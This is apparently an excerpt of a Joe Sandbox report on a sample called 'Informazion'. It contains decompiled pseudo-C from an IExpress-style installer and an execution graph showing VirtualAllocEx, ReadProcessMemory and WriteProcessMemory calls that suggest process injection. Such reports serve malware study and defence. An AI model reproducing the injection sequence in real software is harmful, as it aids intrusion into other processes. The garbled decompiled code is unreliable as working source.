                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$AttributesFile
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                    • API String ID: 438848745-3680919256
                                                    • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                    • Instruction ID: 44065bba55a43b13acc9cc1d0aedb01afb48d9ddd66063baaf12d847f4cb3342
                                                    • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                    • Instruction Fuzzy Hash: 06116F31E1CA8286EA25BF18E4442FD7BA0FB89754F840233C5AD82795DF3DD629C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 31%
                                                    			E00007FF67FF64C511500(signed int __ecx, void* __edx, void* __edi, void* __eflags, long long __rbx, void* __rcx, void* __r8, void* __r9, long long _a16) {
                                                    				signed int _v24;
                                                    				char _v536;
                                                    				signed int _t17;
                                                    				signed long long _t28;
                                                    				void* _t43;
                                                    
                                                    				_t17 = __ecx;
                                                    				_a16 = __rbx;
                                                    				_t28 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v24 = _t28 ^ _t43 - 0x00000230;
                                                    				if (__eflags == 0) goto 0x4c511557;
                                                    				if (__edx - 0x110 != 1) goto 0x4c511553;
                                                    				if (__r8 + 0xfffff7c3 - 1 > 0) goto 0x4c511553;
                                                    				EndDialog(??, ??);
                                                    				goto 0x4c5115bb;
                                                    				goto 0x4c5115c0;
                                                    				GetDesktopWindow();
                                                    				E00007FF67FF64C514C68(__r8 + 0xfffff7c3 - 1, __rcx, __rcx, __r8, __r8 + 0xfffff7c3, __r9);
                                                    				r9d = 0x200;
                                                    				_v536 = 0;
                                                    				LoadStringA(??, ??, ??, ??);
                                                    				SetDlgItemTextA(??, ??, ??);
                                                    				MessageBeep(??);
                                                    				return E00007FF67FF64C518470(1, _t17 | 0xffffffff, _v24 ^ _t43 - 0x00000230);
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                    • String ID:
                                                    • API String ID: 1273765764-0
                                                    • Opcode ID: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                    • Instruction ID: 3c2a5cb2ef85fd62802ceab99d3f8bd92021cdf13708a68dd1a7bb121848b4ec
                                                    • Opcode Fuzzy Hash: 959f28d1b95b8526aa68c42a3a998ab188e5ed3d10e9a2e05c875aba66557268
                                                    • Instruction Fuzzy Hash: 94118161E0CA8186EA647F18B4083BE7B60FB89B54F455232C96E47386CF3CD0558A00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00007FF67FF64C513BF4(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r11) {
                                                    				void* __rbp;
                                                    				signed int _t86;
                                                    				int _t100;
                                                    				short _t108;
                                                    				signed int _t112;
                                                    				intOrPtr _t116;
                                                    				int _t128;
                                                    				void* _t130;
                                                    				intOrPtr _t133;
                                                    				void* _t135;
                                                    				void* _t136;
                                                    				void* _t137;
                                                    				void* _t138;
                                                    				void* _t170;
                                                    				signed long long _t171;
                                                    				signed long long _t172;
                                                    				signed long long _t174;
                                                    				CHAR* _t190;
                                                    				void* _t193;
                                                    				signed long long _t194;
                                                    				signed long long _t196;
                                                    				void* _t203;
                                                    				void* _t204;
                                                    				struct HWND__* _t206;
                                                    				void* _t208;
                                                    				void* _t211;
                                                    				void* _t213;
                                                    				int _t216;
                                                    				struct _OSVERSIONINFOA* _t218;
                                                    				intOrPtr* _t221;
                                                    
                                                    				_t204 = __r11;
                                                    				_t188 = __rsi;
                                                    				_t186 = __rdi;
                                                    				_t175 = __rbx;
                                                    				_t170 = _t193;
                                                    				 *((long long*)(_t170 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t170 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t170 + 0x20)) = __rdi;
                                                    				_t191 = _t170 - 0x128;
                                                    				_t194 = _t193 - 0x200;
                                                    				_t171 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t172 = _t171 ^ _t194;
                                                    				 *(_t170 - 0x128 + 0xf0) = _t172;
                                                    				_t214 = __rcx;
                                                    				 *((intOrPtr*)(_t194 + 0x40)) = 0x94;
                                                    				_t128 = GetVersionExA(_t218);
                                                    				if (_t128 != 0) goto 0x4c513c59;
                                                    				goto 0x4c513e7f;
                                                    				r14d =  *(_t194 + 0x48);
                                                    				_t116 =  *((intOrPtr*)(_t194 + 0x44));
                                                    				if (_t128 == 0) goto 0x4c513cd3;
                                                    				if ( *((intOrPtr*)(_t194 + 0x50)) - 1 == 1) goto 0x4c513c7f;
                                                    				goto 0x4c513e7f;
                                                    				 *0x4c51de78 = 2;
                                                    				 *0x4c51c1ac = 1;
                                                    				 *0x4c51c1a8 = 1;
                                                    				_t11 = _t188 + 2; // 0x3
                                                    				_t108 = _t11;
                                                    				_t130 = _t116 - _t108;
                                                    				if (_t130 > 0) goto 0x4c513cc2;
                                                    				 *0x4c51de78 = 1;
                                                    				if (_t130 < 0) goto 0x4c513cb4;
                                                    				if (_t130 != 0) goto 0x4c513cee;
                                                    				if (r14d - 0x33 >= 0) goto 0x4c513cee;
                                                    				 *0x4c51c1ac = 0;
                                                    				 *0x4c51c1a8 = 0;
                                                    				goto 0x4c513cee;
                                                    				if (_t116 - 5 < 0) goto 0x4c513cee;
                                                    				 *0x4c51de78 = _t108;
                                                    				goto 0x4c513cee;
                                                    				 *0x4c51de78 = 0;
                                                    				 *0x4c51c1ac = 1;
                                                    				 *0x4c51c1a8 = 1;
                                                    				_t133 =  *0x4c51cd14; // 0x0
                                                    				if (_t133 != 0) goto 0x4c513f34;
                                                    				if (__rcx == 0) goto 0x4c513f34;
                                                    				r15d =  *(_t194 + 0x4c) & 0x0000ffff;
                                                    				_t13 = _t214 + 0x40; // 0x40
                                                    				 *(_t194 + 0x30) = 0;
                                                    				r10d = 0;
                                                    				r11d = 0;
                                                    				asm("dec eax");
                                                    				_t208 = _t13 + (_t172 & 0xffffffc4);
                                                    				_t196 = r11d + r11d * 2;
                                                    				_t135 = _t116 -  *((intOrPtr*)(_t208 + _t196 * 8));
                                                    				if (_t135 >= 0) goto 0x4c513d38;
                                                    				goto 0x4c513d4a;
                                                    				if (_t135 <= 0) goto 0x4c513d3e;
                                                    				goto 0x4c513d4a;
                                                    				_t136 = r14d -  *((intOrPtr*)(_t208 + 4 + _t196 * 8));
                                                    				if (_t136 < 0) goto 0x4c513d34;
                                                    				_t112 = 0 | _t136 > 0x00000000;
                                                    				_t137 = _t116 -  *((intOrPtr*)(_t208 + 0xc + _t196 * 8));
                                                    				if (_t137 < 0) goto 0x4c513d63;
                                                    				if (_t137 <= 0) goto 0x4c513d57;
                                                    				goto 0x4c513d63;
                                                    				_t138 = r14d -  *((intOrPtr*)(_t208 + 0x10 + _t196 * 8));
                                                    				if (_t138 < 0) goto 0x4c513d63;
                                                    				_t86 = 0 | _t138 > 0x00000000;
                                                    				if (_t112 < 0) goto 0x4c513e17;
                                                    				if (_t86 > 0) goto 0x4c513e17;
                                                    				if (_t112 != 0) goto 0x4c513d99;
                                                    				if (_t86 != 0) goto 0x4c513d8c;
                                                    				if (r15d -  *((intOrPtr*)(_t208 + 8 + _t196 * 8)) < 0) goto 0x4c513dac;
                                                    				goto 0x4c513da6;
                                                    				if (r15d -  *((intOrPtr*)(_t208 + 8 + _t196 * 8)) >= 0) goto 0x4c513e3c;
                                                    				goto 0x4c513dac;
                                                    				if (r15d != 0) goto 0x4c513e3c;
                                                    				if (r15d -  *((intOrPtr*)(_t208 + 0x14 + _t196 * 8)) <= 0) goto 0x4c513e3c;
                                                    				if (r11d == 0) goto 0x4c513e1c;
                                                    				r14d = 0;
                                                    				if (0x54c != 0x54d) goto 0x4c513de6;
                                                    				_t174 = r10d;
                                                    				_t211 = _t174 * 0x3c + __rcx + __rdx + 0x84;
                                                    				if (_t211 == 0) goto 0x4c513ea4;
                                                    				_t47 = _t214 + 0x84; // 0x84
                                                    				_t221 = _t47 + _t174;
                                                    				if ((sil &  *(_t211 + 0x30)) == 0) goto 0x4c513e96;
                                                    				r14d = 0x104;
                                                    				goto 0x4c513ea4;
                                                    				if (r11d == 1) goto 0x4c513e33;
                                                    				_t51 = _t204 + 1; // 0x1
                                                    				r10d = _t51;
                                                    				 *(_t194 + 0x30) = r10d;
                                                    				r11d = r10d;
                                                    				if (r10d - 2 >= 0) goto 0x4c513e38;
                                                    				goto 0x4c513d24;
                                                    				if (0x54c != 0) goto 0x4c513e69;
                                                    				if ( *((intOrPtr*)(__rcx + 0x7c)) == 0) goto 0x4c513f34;
                                                    				_t179 = __rcx;
                                                    				if (E00007FF67FF64C512834( *((intOrPtr*)(__rcx + 0x80)), _t174, __rcx, _t170 - 0x108, _t194 + 0x30) != 0) goto 0x4c513f34;
                                                    				r10d =  *(_t194 + 0x30);
                                                    				_t57 = _t186 - 0x54c; // 0x1
                                                    				if (_t57 - 1 <= 0) goto 0x4c513db6;
                                                    				if (0x54d == 0) goto 0x4c513f36;
                                                    				r9d = 0;
                                                    				 *((intOrPtr*)(_t194 + 0x28)) = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t194 + 0x20)) = 0x10;
                                                    				goto 0x4c513f2b;
                                                    				asm("inc ebp");
                                                    				r14d = r14d & 0x00000101;
                                                    				if (( *0x4c51cd18 & sil) != 0) goto 0x4c513f17;
                                                    				if (_t221 == 0) goto 0x4c513f17;
                                                    				if ( *_t221 == 0) goto 0x4c513f17;
                                                    				MessageBeep(_t216);
                                                    				if (E00007FF67FF64C517F04(__rbx, __rdi, __rsi, _t196) == 0) goto 0x4c513edc;
                                                    				if (E00007FF67FF64C517E34(_t175, _t191, _t213) != 0) goto 0x4c513ee1;
                                                    				r9d = 0x00000030 | r14d;
                                                    				_t100 = MessageBoxA(_t206, _t190);
                                                    				if ((r14b & 0x00000004) == 0) goto 0x4c513f0a;
                                                    				goto 0x4c513f11;
                                                    				if ((sil & r14b) == 0) goto 0x4c513f34;
                                                    				if (_t100 != 1) goto 0x4c513f34;
                                                    				goto 0x4c513f34;
                                                    				 *((intOrPtr*)(_t194 + 0x28)) = 0;
                                                    				 *((intOrPtr*)(_t194 + 0x20)) = 0x30;
                                                    				E00007FF67FF64C514DCC(_t179, 0x4c51d578, _t194 + 0x30, _t203);
                                                    				return E00007FF67FF64C518470(0xbadbad, 0,  *(_t191 + 0xf0) ^ _t194);
                                                    			}
                                                    0x7ff64c513e5f
                                                    0x7ff64c513e69
                                                    0x7ff64c513e71
                                                    0x7ff64c513e79
                                                    0x7ff64c513e7f
                                                    0x7ff64c513e82
                                                    0x7ff64c513e86
                                                    0x7ff64c513e89
                                                    0x7ff64c513e91
                                                    0x7ff64c513e9a
                                                    0x7ff64c513e9d
                                                    0x7ff64c513eab
                                                    0x7ff64c513eb0
                                                    0x7ff64c513eb5
                                                    0x7ff64c513eb9
                                                    0x7ff64c513ecc
                                                    0x7ff64c513eda
                                                    0x7ff64c513eeb
                                                    0x7ff64c513ef3
                                                    0x7ff64c513f03
                                                    0x7ff64c513f08
                                                    0x7ff64c513f0d
                                                    0x7ff64c513f11
                                                    0x7ff64c513f15
                                                    0x7ff64c513f1c
                                                    0x7ff64c513f20
                                                    0x7ff64c513f2f
                                                    0x7ff64c513f6a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                    • String ID: Maintal
                                                    • API String ID: 2312377310-1608070445
                                                    • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                    • Instruction ID: db4caa9821ef036dcfd9a6458e76e507f6ce5768cca04e91995a4e771715f028
                                                    • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                    • Instruction Fuzzy Hash: 7BA18C36E1D24286FB68BF19946867D6EA4BF44794F110137E9ADC3380CE3DE864CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 23%
                                                    			E00007FF67FF64C5178B0(void* __ecx, long long __rbx, void* __r9, long long _a16) {
                                                    				signed int _v40;
                                                    				char _v312;
                                                    				signed int _v328;
                                                    				signed long long _v344;
                                                    				intOrPtr _v352;
                                                    				signed long long _v360;
                                                    				void* __rsi;
                                                    				void* __rbp;
                                                    				char _t22;
                                                    				char _t37;
                                                    				signed long long _t43;
                                                    				char* _t48;
                                                    				char* _t59;
                                                    				void* _t63;
                                                    				void* _t65;
                                                    				void* _t68;
                                                    
                                                    				_a16 = __rbx;
                                                    				_t43 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_v40 = _t43 ^ _t65 - 0x00000170;
                                                    				_v328 = _v328 & 0x00000000;
                                                    				_t59 =  &_v312;
                                                    				r10d = 0x104;
                                                    				r9d = r10d;
                                                    				if (__r9 + 0x7ffffefa == 0) goto 0x4c51791a;
                                                    				_t22 =  *((intOrPtr*)(0x4c51d610 -  &_v312 + _t59));
                                                    				_t37 = _t22;
                                                    				if (_t37 == 0) goto 0x4c51791a;
                                                    				 *_t59 = _t22;
                                                    				_t60 = _t59 + __rbx;
                                                    				if (_t37 != 0) goto 0x4c5178fd;
                                                    				_t9 = _t60 - 1; // 0x103
                                                    				_t48 =  !=  ? _t59 + __rbx : _t9;
                                                    				 *_t48 = 0;
                                                    				E00007FF67FF64C517BA8(r10d, _t48, __rbx,  &_v312, _t63, __r9, _t68);
                                                    				_v344 = _v344 & 0x00000000;
                                                    				_v352 = 0x80;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_v360 = 2;
                                                    				CreateFileA(??, ??, ??, ??, ??, ??, ??);
                                                    				if (_t48 != 0xffffffff) goto 0x4c51797e;
                                                    				 *0x4c51d544 = 0x80070052;
                                                    				goto 0x4c5179c3;
                                                    				_v360 = _v360 & 0x00000000;
                                                    				r8d = __ecx;
                                                    				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x4c5179a8;
                                                    				if (__ecx == _v328) goto 0x4c5179b4;
                                                    				 *0x4c51d544 = 0x80070052;
                                                    				CloseHandle(??);
                                                    				return E00007FF67FF64C518470(0, __ecx, _v40 ^ _t65 - 0x00000170);
                                                    			}

                                                    0x7ff64c5178b0
                                                    0x7ff64c5178bf
                                                    0x7ff64c5178c9
                                                    0x7ff64c5178d1
                                                    0x7ff64c5178dd
                                                    0x7ff64c5178e9
                                                    0x7ff64c5178fa
                                                    0x7ff64c517907
                                                    0x7ff64c517909
                                                    0x7ff64c51790c
                                                    0x7ff64c51790e
                                                    0x7ff64c517910
                                                    0x7ff64c517912
                                                    0x7ff64c517918
                                                    0x7ff64c51791a
                                                    0x7ff64c517926
                                                    0x7ff64c51792d
                                                    0x7ff64c517930
                                                    0x7ff64c517935
                                                    0x7ff64c517940
                                                    0x7ff64c517948
                                                    0x7ff64c51794b
                                                    0x7ff64c51794e
                                                    0x7ff64c51795b
                                                    0x7ff64c51796e
                                                    0x7ff64c517970
                                                    0x7ff64c51797c
                                                    0x7ff64c51797e
                                                    0x7ff64c517989
                                                    0x7ff64c5179a0
                                                    0x7ff64c5179a6
                                                    0x7ff64c5179a8
                                                    0x7ff64c5179b7
                                                    0x7ff64c5179e7

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleWrite
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                    • API String ID: 1065093856-305352358
                                                    • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                    • Instruction ID: 33cb268aa108af616b6d575cfea9ae5fc43aad54794f2c03c800db4845ec798d
                                                    • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                    • Instruction Fuzzy Hash: EB31A532A0C68186EB15BF18E4487BDBB60FB897A4F444236DAAD87795DF7CD518CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00007FF67FF64C518470(void* __eax, signed int __ecx, void* __rcx) {
                                                    				void* _t4;
                                                    
                                                    				_t4 = __rcx -  *0x4c51c008; // 0xdeba5460e397
                                                    				if (_t4 != 0) goto 0x4c518489;
                                                    				asm("dec eax");
                                                    				if ((__ecx & 0x0000ffff) != 0) goto 0x4c518485;
                                                    				return __eax;
                                                    			}

                                                    0x7ff64c518470
                                                    0x7ff64c518477
                                                    0x7ff64c518479
                                                    0x7ff64c518482
                                                    0x7ff64c518484

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                    • String ID:
                                                    • API String ID: 140117192-0
                                                    • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                    • Instruction ID: ed29ac920cac09ae22c8b5314229ccf3b53277c2c8321590299850b4d4170c38
                                                    • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                    • Instruction Fuzzy Hash: 0841C235E0CB4185EA18BF5DF8983696BB4FB89784F904136D9AD82764DF7EE064C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                    • String ID:
                                                    • API String ID: 1214682469-0
                                                    • Opcode ID: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                    • Instruction ID: 9a99a4806531bb7c3a22d745ecfb99af66e7f37e9e8b240026d0a0466ff35157
                                                    • Opcode Fuzzy Hash: 13cac0b9ca72075f5d7f1d00aa19e0549b75852ecd71447385bebf4ad58ecc71
                                                    • Instruction Fuzzy Hash: 52114F31E0DB4186EA14AF19A448269BA60FB49FE1F484735EEAD47B94DF3CD5508A04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Char$Prev$Next
                                                    • String ID:
                                                    • API String ID: 3260447230-0
                                                    • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                    • Instruction ID: d117cc59584f9f52d272cac874aea3fab162d6d874a8ebc758802dda04c44a52
                                                    • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                    • Instruction Fuzzy Hash: 5911A762E0C68185FB193F19B50817DAF91EB59FE4F4A8271DA7E43785CF2CD4508701
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                    • String ID:
                                                    • API String ID: 140117192-0
                                                    • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                    • Instruction ID: 0ac4bfb162db692eb0f85d38d65fe930b6dc8a4783c3da10dff615f9f1eacd0e
                                                    • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                    • Instruction Fuzzy Hash: 7A219D35E0CB4686E618BF49E8883697BB4FB89B44F500136DAAD82764DF7EE064C740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                    • String ID:
                                                    • API String ID: 2776232527-0
                                                    • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                    • Instruction ID: 1719be567204db7b3537c8ab4b48d06f3a40bb215af0ac7c7bbc75002c6e0812
                                                    • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                    • Instruction Fuzzy Hash: 45115832E1C642C7F7647F24E458A7EBE90FB95745F409131D65A82A84EF7CD158CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:8.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:73
                                                    Total number of Limit Nodes:5
                                                    execution_graph 21641 2ba0c98 21642 2ba0cc5 21641->21642 21643 2ba0cf7 21642->21643 21647 2ba0eec 21642->21647 21653 2ba0e10 21642->21653 21658 2ba0e20 21642->21658 21648 2ba0efa 21647->21648 21649 2ba0eaa 21647->21649 21663 2ba0ed8 21649->21663 21666 2ba0ec7 21649->21666 21650 2ba0ec0 21650->21643 21655 2ba0e34 21653->21655 21654 2ba0ec0 21654->21643 21656 2ba0ed8 2 API calls 21655->21656 21657 2ba0ec7 2 API calls 21655->21657 21656->21654 21657->21654 21660 2ba0e34 21658->21660 21659 2ba0ec0 21659->21643 21661 2ba0ed8 2 API calls 21660->21661 21662 2ba0ec7 2 API calls 21660->21662 21661->21659 21662->21659 21664 2ba0ee9 21663->21664 21669 2ba2370 21663->21669 21664->21650 21667 2ba0ee9 21666->21667 21668 2ba2370 2 API calls 21666->21668 21667->21650 21668->21667 21673 2ba23a0 21669->21673 21677 2ba2390 21669->21677 21670 2ba238a 21670->21664 21674 2ba23e2 21673->21674 21676 2ba23e9 21673->21676 21675 2ba243a CallWindowProcW 21674->21675 21674->21676 21675->21676 21676->21670 21678 2ba2395 21677->21678 21679 2ba243a CallWindowProcW 21678->21679 21680 2ba23e9 21678->21680 21679->21680 21680->21670 21637 4c61290 21638 4c612d0 VirtualAllocEx 21637->21638 21640 4c6130d 21638->21640 21604 4cca7c0 21606 4cca7ed 21604->21606 21607 4cca8f1 21604->21607 21605 4ccaaab 21606->21607 21612 4c61d31 21606->21612 21616 4c61d38 21606->21616 21607->21605 21620 4c61350 21607->21620 21624 4c61348 21607->21624 21613 4c61d83 ReadProcessMemory 21612->21613 21615 4c61dc7 21613->21615 21615->21607 21617 4c61d83 ReadProcessMemory 21616->21617 21619 4c61dc7 21617->21619 21619->21607 21621 4c61398 WriteProcessMemory 21620->21621 21623 4c613ef 21621->21623 21623->21605 21625 4c61398 WriteProcessMemory 21624->21625 21627 4c613ef 21625->21627 